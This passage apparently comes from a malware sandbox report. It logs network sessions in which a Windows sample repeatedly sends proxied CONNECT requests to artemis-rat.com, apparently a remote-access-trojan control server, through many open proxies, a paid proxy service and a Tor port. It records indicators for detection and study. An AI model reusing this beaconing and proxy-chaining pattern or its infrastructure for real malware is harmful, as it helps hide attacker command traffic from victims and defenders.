                                                                                                                                                                                                                                                            276192.168.2.55070938.162.8.17131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.722676992 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.171797037 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            277192.168.2.55065698.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.728524923 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            278192.168.2.550599103.200.135.22841453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.750897884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            279192.168.2.550650217.23.11.194327083876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.751988888 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.049307108 CET | 226 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Length: 101
Content-Type: text/plain; charset=utf-8
Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
280192.168.2.55074738.162.6.18731283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.754793882 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.188783884 CET  111  IN  HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Ascii: Proxy Authentication Required


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
281192.168.2.550802154.208.10.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.762784004 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.923468113 CET  309  IN  HTTP/1.1 400 Bad Request
Server: nginx/1.23.1
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
282192.168.2.55079272.167.220.46288103876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.764067888 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.201702118 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.691128969 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.670454979 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.635797977 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.694984913 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.702579021 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.608360052 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.405179977 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
283192.168.2.55063545.11.95.16560123876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.764070988 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
284192.168.2.550655121.182.138.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.767456055 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.067522049 CET  340  IN  HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 173
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>
Mar 11, 2024 03:30:42.073328972 CET  339  IN
Data Ascii: TTP/1.1 400 Bad RequestServer: nginx/1.12.2Date: Mon, 11 Mar 2024 02:30:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 173Connection: close<html><head><title>400 Bad Request</title></head><body bgcolor="white">


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
285192.168.2.55057843.231.22.229803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.775605917 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.187432051 CET  343  IN  HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            286192.168.2.55058980.249.112.162803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.781188011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:17.978811979 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:19.006568909 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:20.226150990 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:22.846352100 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:27.713888884 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:37.442261934 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:56.893462896 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:32:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            287192.168.2.550758190.120.249.14941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.791850090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            288192.168.2.550814104.16.108.204803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.792597055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.948542118 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            289192.168.2.550823104.17.171.235803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.795819998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.954982042 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            290192.168.2.55066637.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.796717882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            291192.168.2.550826104.17.166.210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.797494888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.955715895 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            292192.168.2.550053208.87.131.240413683876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.801661968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811242104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811671972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.852344036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            293192.168.2.550677144.76.96.18055663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.803747892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.112215042 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            294192.168.2.55069894.23.220.136252563876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.805360079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.482949972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.436109066 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.389678001 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.202553034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.092782974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.905155897 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.592736006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
295192.168.2.550837162.159.242.10803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.838001966 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.998965979 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
296192.168.2.55069951.79.240.9431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.838001966 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.545456886 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.561085939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.635730028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
